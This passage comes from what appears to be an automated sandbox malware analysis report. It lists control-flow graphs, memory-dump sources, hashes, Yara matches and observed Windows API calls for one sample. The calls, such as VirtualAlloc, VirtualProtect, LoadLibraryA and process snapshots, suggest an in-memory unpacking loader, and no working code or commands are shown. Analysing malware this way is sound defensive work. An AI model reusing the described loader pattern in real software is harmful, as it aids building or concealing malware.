                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq$Haq
                                                    • API String ID: 0-3785302501
                                                    • Opcode ID: 50e7af9fe964de7a50b4ad3b7e224b253fe204379ae6488cc0b94f2c3ef9c403
                                                    • Instruction ID: ac26c8756cb2d16190a117f741ecd5c6b65200f3b061286da639682674c384a4
                                                    • Opcode Fuzzy Hash: 50e7af9fe964de7a50b4ad3b7e224b253fe204379ae6488cc0b94f2c3ef9c403
                                                    • Instruction Fuzzy Hash: A042BD30B443499FCB45DBB8D8546AEBFF2AF89340B1485A9E845DB392DB34DC46CB90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 796 60a1a68-60a1a7e 799 60a1a89 796->799 800 60a1a80-60a1a86 796->800 801 60a1a91-60a1a93 799->801 802 60a1aa0-60a1aac 801->802 803 60a1a95-60a1a9d 801->803 805 60a1aae-60a1ab7 802->805 806 60a1b25-60a1b2b 802->806 809 60a1ab9-60a1abf 805->809 810 60a1ac1-60a1b1e 805->810 807 60a1b2d-60a1b36 806->807 808 60a1ba4-60a1bad 806->808 811 60a1b38-60a1b3e 807->811 812 60a1b40-60a1b9d 807->812 813 60a1baf-60a1bb5 808->813 814 60a1bb7-60a1c41 808->814 809->810 810->806 811->812 812->808 813->814 840 60a1c43-60a1c4d 814->840 841 60a1c55-60a1c5c 814->841 840->841 842 60a1c5e-60a1c8d 841->842 843 60a1c95-60a1ca3 841->843 842->843 847 60a1ca9-60a1cad 843->847 848 60a1ded-60a1df1 843->848 852 60a1caf-60a1cb9 847->852 853 60a1cc1-60a1cc8 847->853 850 60a1df3-60a1dfd 848->850 851 60a1e05-60a1e0c 848->851 850->851 856 60a1e0e-60a1e3d 851->856 857 60a1e45-60a1e57 851->857 852->853 854 60a1cca-60a1cf9 853->854 855 60a1d01-60a1d12 853->855 854->855 866 60a1f46-60a1f4f 855->866 868 60a1d18-60a1d1c 855->868 856->857 865 60a1e5d-60a1e61 857->865 857->866 872 60a1e63-60a1e6d 865->872 873 60a1e75-60a1e7c 865->873 869 60a1d1e-60a1d28 868->869 870 60a1d30-60a1d37 868->870 869->870 875 60a1d39-60a1d68 870->875 876 60a1d70-60a1d85 870->876 872->873 877 60a1e7e-60a1ead 873->877 878 60a1eb5-60a1ed7 873->878 875->876 876->866 888 60a1d8b-60a1d8f 876->888 877->878 878->866 897 60a1ed9-60a1edd 878->897 891 60a1da3-60a1daa 888->891 892 60a1d91-60a1d9b 888->892 895 60a1ddf-60a1dec 891->895 896 60a1dac-60a1dd7 891->896 892->891 896->895 901 60a1edf-60a1ee9 897->901 902 60a1ef1-60a1ef8 897->902 901->902 903 60a1efa-60a1f25 902->903 904 60a1f2d-60a1f45 902->904 903->904
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XX]q$XX]q
                                                    • API String ID: 0-1534917266
                                                    • Opcode ID: dfd1e5fe81e93ef183ce2c30383cf5f2524e9f02ca9b78412a5e28bb67057241
                                                    • Instruction ID: 7c2f4f8b3a85f23e141e0e25e5db030f27283857a53d1d445a61205e0657f703
                                                    • Opcode Fuzzy Hash: dfd1e5fe81e93ef183ce2c30383cf5f2524e9f02ca9b78412a5e28bb67057241
                                                    • Instruction Fuzzy Hash: 4CD1AD30A803069FCB54EB75D490B6EBBE7EF84350F1089A8D9268B654DF34AC49CB91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq
                                                    • API String ID: 0-600464949
                                                    • Opcode ID: cd9fb8f1c10a529839031c03bc26b3adf6e24c37d3833d93f2b7dc5f3c12de05
                                                    • Instruction ID: 698933f1aebe0a317e8dad2bcfee211d6bc4a8bdbe45f18014fd3474c5cae4a6
                                                    • Opcode Fuzzy Hash: cd9fb8f1c10a529839031c03bc26b3adf6e24c37d3833d93f2b7dc5f3c12de05
                                                    • Instruction Fuzzy Hash: 4A329C35A442059FCB55DF69E884AAEBFF2EF88310F148469E845DB351DB34EC45CB90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (_]q
                                                    • API String ID: 0-188044275
                                                    • Opcode ID: 1388c8326d5d8f2374dc784adf293a93d224b48fb23c526ed969a81343c4a69c
                                                    • Instruction ID: e718f46d4b735d6575d6d7998aff58dcaf124684cc6a2a087d26a2fab6aa2d64
                                                    • Opcode Fuzzy Hash: 1388c8326d5d8f2374dc784adf293a93d224b48fb23c526ed969a81343c4a69c
                                                    • Instruction Fuzzy Hash: BFA15A30E40319DFDB58DF64D894A9DBBB6FF88304F1086A9E405AB250EF70A985CF90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e06d291d6212387006488c0c3a4294300f70ede729d0d327449353e3ecf89b09
                                                    • Instruction ID: 01fbfcc90b516368fe3fc0f7181bcbd6e485e1a015087b41660b9b93ac7bef9f
                                                    • Opcode Fuzzy Hash: e06d291d6212387006488c0c3a4294300f70ede729d0d327449353e3ecf89b09
                                                    • Instruction Fuzzy Hash: FC626A30A40319CFDB55DF68C8547AEBBF2BF84300F148699D849AB395DB34E986CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d9fc02fbc651f6bfbe814f08f7a86580a7a5e9c15b2615dd0e96de16fb09945
                                                    • Instruction ID: b4bc13d6dedc8fc52d0618aaf413094413b4aeef3b40072454ccec076533919d
                                                    • Opcode Fuzzy Hash: 5d9fc02fbc651f6bfbe814f08f7a86580a7a5e9c15b2615dd0e96de16fb09945
                                                    • Instruction Fuzzy Hash: 0062E974A402188FCB15DF64D898BAEBBB7BF88300F1485A9E94A9B355DF349D81CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea9b0b7a4482a2d4ddd4340537e2291cf2c619a9e1fbbf3324c6b6da1210a93f
                                                    • Instruction ID: 43127079bf68d470591ffbdf8e4e42fda8661ff789f016ed1f41e51444aacc5d
                                                    • Opcode Fuzzy Hash: ea9b0b7a4482a2d4ddd4340537e2291cf2c619a9e1fbbf3324c6b6da1210a93f
                                                    • Instruction Fuzzy Hash: 8F22F230B803059FC795DB39D894A6EBFE6EF84250B1488A9E846DB391DF34EC45CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 97e543abccce0ec11d525fc2f0566dcb5e7290b20577a29bd3b9e758301e9d54
                                                    • Instruction ID: 3d5e775395c72f43a88d33b16a65fc4217306a7199199c3d310660f161ebb1d0
                                                    • Opcode Fuzzy Hash: 97e543abccce0ec11d525fc2f0566dcb5e7290b20577a29bd3b9e758301e9d54
                                                    • Instruction Fuzzy Hash: 2D229D30B403559FC7589B7A98A872E7AE6AFC8380F148879E846CB395DF74DC05CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6fa59dec514edb4cafa37bbb47f3aa17fb84e45b9c6175dff2e5d686b7fea6a3
                                                    • Instruction ID: 47dce57c918f97cea9f66d638b264b42c209e176d527ffe2d3495091c5d5304a
                                                    • Opcode Fuzzy Hash: 6fa59dec514edb4cafa37bbb47f3aa17fb84e45b9c6175dff2e5d686b7fea6a3
                                                    • Instruction Fuzzy Hash: 0E226A34A00219CFCB15DF68D494A6EBBB7FF88300F1585A9E8169B365DB39EC45CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90bc2ab668c01ddca327d732bc4047105f5c7df7c79c9c1d6b80d00f6e8e3c71
                                                    • Instruction ID: 7105d23d110e866703a227ecc1533de0f596c6d9acd953b205db1efb61480dbf
                                                    • Opcode Fuzzy Hash: 90bc2ab668c01ddca327d732bc4047105f5c7df7c79c9c1d6b80d00f6e8e3c71
                                                    • Instruction Fuzzy Hash: AAE16D34A002059FCB15DF68D584AAEBBF3FF88310B198469E845DB355DB39EC46CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1147fa351206ccab6bb3c3389fbb5020529d894dc583a3b59f401c763384afca
                                                    • Instruction ID: ffc453b171570b32f2ea62d196dbba458f96056d16d765ee88afbba2dd5b69ef
                                                    • Opcode Fuzzy Hash: 1147fa351206ccab6bb3c3389fbb5020529d894dc583a3b59f401c763384afca
                                                    • Instruction Fuzzy Hash: 6DC1A530A80306DFDB95DF36E594B6ABBE7EF84340F44C968D8168B655DB34E848CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25a4d8792151dbfdb0cbb288500f13e9b814d642e388c6da2ef24c0c2fd9aa44
                                                    • Instruction ID: 45a8a882e4e8b81403e34cad076192749e419e2ddc41f5d559c37713d0d3b185
                                                    • Opcode Fuzzy Hash: 25a4d8792151dbfdb0cbb288500f13e9b814d642e388c6da2ef24c0c2fd9aa44
                                                    • Instruction Fuzzy Hash: 9CA19135A04205DFCB05DFB4C854AAEBBBBFF89340B1584A9E905DF265DB35D802CB60

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 207 61003c-610047 208 610049 207->208 209 61004c-610263 call 610a3f call 610df8 call 610d90 VirtualAlloc 207->209 208->209 224 610265-610289 call 610a69 209->224 225 61028b-610292 209->225 230 6102ce-6103c2 VirtualProtect call 610cce call 610ce7 224->230 227 6102a1-6102b0 225->227 229 6102b2-6102cc 227->229 227->230 229->227 236 6103d1-6103e0 230->236 237 6103e2-610437 call 610ce7 236->237 238 610439-6104b8 VirtualFree 236->238 237->236 240 6105f4-6105fe 238->240 241 6104be-6104cd 238->241 244 610604-61060d 240->244 245 61077f-610789 240->245 243 6104d3-6104dd 241->243 243->240 249 6104e3-610505 LoadLibraryA 243->249 244->245 250 610613-610637 244->250 247 6107a6-6107b0 245->247 248 61078b-6107a3 245->248 251 6107b6-6107cb 247->251 252 61086e-6108be LoadLibraryA 247->252 248->247 253 610517-610520 249->253 254 610507-610515 249->254 255 61063e-610648 250->255 256 6107d2-6107d5 251->256 260 6108c7-6108f9 252->260 257 610526-610547 253->257 254->257 255->245 258 61064e-61065a 255->258 261 610824-610833 256->261 262 6107d7-6107e0 256->262 263 61054d-610550 257->263 258->245 259 610660-61066a 258->259 266 61067a-610689 259->266 268 610902-61091d 260->268 269 6108fb-610901 260->269 267 610839-61083c 261->267 270 6107e2 262->270 271 6107e4-610822 262->271 264 6105e0-6105ef 263->264 265 610556-61056b 263->265 264->243 272 61056d 265->272 273 61056f-61057a 265->273 274 610750-61077a 266->274 275 61068f-6106b2 266->275 267->252 276 61083e-610847 267->276 269->268 270->261 271->256 272->264 277 61059b-6105bb 273->277 278 61057c-610599 273->278 274->255 279 6106b4-6106ed 275->279 280 6106ef-6106fc 275->280 281 610849 276->281 282 61084b-61086c 276->282 290 6105bd-6105db 277->290 278->290 279->280 284 61074b 280->284 285 6106fe-610748 280->285 281->252 282->267 284->266 285->284 290->263
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0061024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                    • Instruction ID: 0527fce760f75dd874a3987a115ee5e2f0a62a7435cdba5a1d8e6a9f04e37544
                                                    • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                    • Instruction Fuzzy Hash: 57525874A012299FDB64CF68C985BA8BBB1BF09304F1480D9E54DAB351DB70AAC5DF14

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 291 4018f0-4018fa 292 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 291->292 293 4018fc-401900 291->293 296 401940-401949 GetLastError 292->296 297 401996-40199a 292->297 298 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 296->298 299 40198d-40198f 296->299 298->299 299->297 301 401991 call 401030 299->301 301->297
                                                    APIs
                                                    • lstrlenA.KERNEL32(?), ref: 00401906
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                    • GetLastError.KERNEL32 ref: 00401940
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                    • String ID:
                                                    • API String ID: 3322701435-0
                                                    • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                    • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                    • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                    • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 304 40af66-40af6e 305 40af7d-40af88 call 40b84d 304->305 308 40af70-40af7b call 40d2e3 305->308 309 40af8a-40af8b 305->309 308->305 312 40af8c-40af98 308->312 313 40afb3-40afca call 40af49 call 40cd39 312->313 314 40af9a-40afb2 call 40aefc call 40d2bd 312->314 314->313
                                                    APIs
                                                    • _malloc.LIBCMT ref: 0040AF80
                                                      • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                      • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                      • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                      • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                    • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1411284514-0
                                                    • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                    • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                    • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                    • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 396 60d8e20-60d8e28 397 60d8dbc-60d8e06 396->397 398 60d8e2a-60d8e2c 396->398 427 60d8e08-60d8e12 397->427 428 60d8e1a-60d8e1b 397->428 399 60d8e2e-60d8e41 398->399 400 60d8e6a-60d8e86 call 60d5610 398->400 402 60d8e98-60d8ea1 399->402 403 60d8e43-60d8e45 399->403 447 60d8e88 call 60d8f48 400->447 448 60d8e88 call 60d8e20 400->448 405 60d8eaa-60d8edf 402->405 406 60d8ea3-60d8ea8 call 60d2378 402->406 407 60d8e4b-60d8e69 403->407 408 60d8ee6-60d8eef 403->408 405->408 406->405 407->400 411 60d8ef8-60d8f5d 408->411 412 60d8ef1-60d8ef6 call 60d2378 408->412 437 60d8f65-60d8f67 411->437 412->411 422 60d8e8e-60d8e95 427->428 438 60d8f69-60d8f6b 437->438 439 60d8f97-60d8f99 437->439 440 60d8f6d-60d8f7b 438->440 441 60d8f7e-60d8f94 438->441 442 60d8fad-60d8fb1 439->442 443 60d8f9b-60d8fa8 call 60d5c88 439->443 443->442 447->422 448->422
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq$(aq$4']q
                                                    • API String ID: 0-2172323925
                                                    • Opcode ID: 81404c1c1faf27779101a0418855a9665be22a9a399ba03488951009bb39700f
                                                    • Instruction ID: 6c10fd1e4f728f40679efaca775694d4f9bfe40b8d163a971b1fa9cec7e0af59
                                                    • Opcode Fuzzy Hash: 81404c1c1faf27779101a0418855a9665be22a9a399ba03488951009bb39700f
                                                    • Instruction Fuzzy Hash: 87414731B483915FC79A6B39A85466F7FE39FC6280B1985BAE541CB392DE30CC06C751

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 643 68f6a6-68f6bf 644 68f6c1-68f6c3 643->644 645 68f6ca-68f6d6 CreateToolhelp32Snapshot 644->645 646 68f6c5 644->646 647 68f6d8-68f6de 645->647 648 68f6e6-68f6f3 Module32First 645->648 646->645 647->648 653 68f6e0-68f6e4 647->653 649 68f6fc-68f704 648->649 650 68f6f5-68f6f6 call 68f365 648->650 654 68f6fb 650->654 653->644 653->648 654->649
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0068F6CE
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0068F6EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0068E000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_68e000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: 8b14b4c748018d01024fdf7bcb60481c7f56c29f1ddf156fbb222d37ff7a74e4
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: 85F062321007116BDB203BB59C8DAAE76E9AF49725F200739E642D11D0EAB0E8854B65

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 656 610df8-610e0d SetErrorMode * 2 657 610e14-610e15 656->657 658 610e0f 656->658 658->657
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00000400,?,?,00610223,?,?), ref: 00610E02
                                                    • SetErrorMode.KERNELBASE(00000000,?,?,00610223,?,?), ref: 00610E07
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction ID: 9c39e30f821fba7d5bf340180a413f16f1525df27d45ff7d7b23a61af46adc84
                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction Fuzzy Hash: ECD0123114512C77DB002B95DC09BCD7B1C9F05B66F048011FB0DD9181CBB0998046E5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 659 60d5720-60d5730 660 60d5761-60d576a 659->660 661 60d5732-60d5741 659->661 662 60d576c-60d5771 call 60d2378 660->662 663 60d5773-60d57a8 660->663 667 60d57af-60d57b9 661->667 668 60d5743-60d5753 call 60d5c88 661->668 662->663 663->667 670 60d57bb-60d57c0 call 60d2378 667->670 671 60d57c3-60d5869 667->671 678 60d5759-60d575e 668->678 670->671 692 60d586b-60d5876 671->692 693 60d5877-60d5883 671->693 692->693 694 60d5889-60d5892 693->694 695 60d5948-60d5951 693->695 698 60d589e-60d58a4 694->698 699 60d5894-60d589d 694->699 696 60d595a-60d5981 695->696 697 60d5953-60d5958 call 60d2378 695->697 714 60d598f-60d59bc 696->714 715 60d5982-60d598c 696->715 697->696 701 60d58a6-60d58af 698->701 702 60d58b0-60d58b6 698->702 705 60d58b8-60d58c1 702->705 706 60d58c2-60d58cc 702->706 707 60d58ce-60d58d3 call 60d2378 706->707 708 60d58d6-60d5941 706->708 707->708 708->695 722 60d5ae4-60d5af5 714->722 723 60d59c2-60d59e4 714->723 715->715 717 60d598e 715->717 717->714 723->722 730 60d59ea-60d59fa 723->730 730->722 733 60d5a00-60d5a04 730->733 734 60d5a0a-60d5a11 733->734 735 60d5af6-60d5b00 733->735 736 60d5a13-60d5a16 734->736 737 60d5a22-60d5a25 734->737 747 60d5b74-60d5b79 735->747 748 60d5b02-60d5b08 735->748 738 60d5a18-60d5a1b 736->738 739 60d5a3a-60d5a49 736->739 740 60d5a27-60d5a2a 737->740 741 60d5a86-60d5a95 737->741 743 60d5a1d 738->743 744 60d5a56-60d5a65 738->744 739->722 757 60d5a4f-60d5a51 739->757 745 60d5a2c-60d5a2f 740->745 746 60d5a9e-60d5aad 740->746 741->722 755 60d5a97-60d5a9c 741->755 743->722 765 60d5a6e-60d5a7d 744->765 766 60d5a67-60d5a6c 744->766 750 60d5ace-60d5add 745->750 751 60d5a35 745->751 762 60d5aaf-60d5ab4 746->762 763 60d5ab6-60d5ac5 746->763 753 60d5b7c-60d5b7e 747->753 748->753 754 60d5b0a-60d5b13 748->754 750->722 768 60d5adf 750->768 751->722 758 60d5b88-60d5bfd 753->758 759 60d5b80-60d5b85 call 60d2378 753->759 755->722 757->722 781 60d5bff-60d5c04 call 60d2378 758->781 782 60d5c07-60d5c79 758->782 759->758 762->722 763->722 774 60d5ac7-60d5acc 763->774 765->722 772 60d5a7f-60d5a84 765->772 766->722 768->722 772->722 774->722 781->782 793 60d5c7b-60d5c86 782->793 794 60d5c87 782->794 793->794
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq$Haq
                                                    • API String ID: 0-3785302501
                                                    • Opcode ID: dc4cb02349911eeaa62d195c60cb193498834f22cc353029803f9de201781e60
                                                    • Instruction ID: 36eabf932cab4a5a40655ef51df5e4e3a78bfef76a538dcdf6c865aca9423aad
                                                    • Opcode Fuzzy Hash: dc4cb02349911eeaa62d195c60cb193498834f22cc353029803f9de201781e60
                                                    • Instruction Fuzzy Hash: 0CE1E030B403558FCB86DB79D89466E7FE6AF89340B1445BAE809DB395DE34DC02CBA1

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
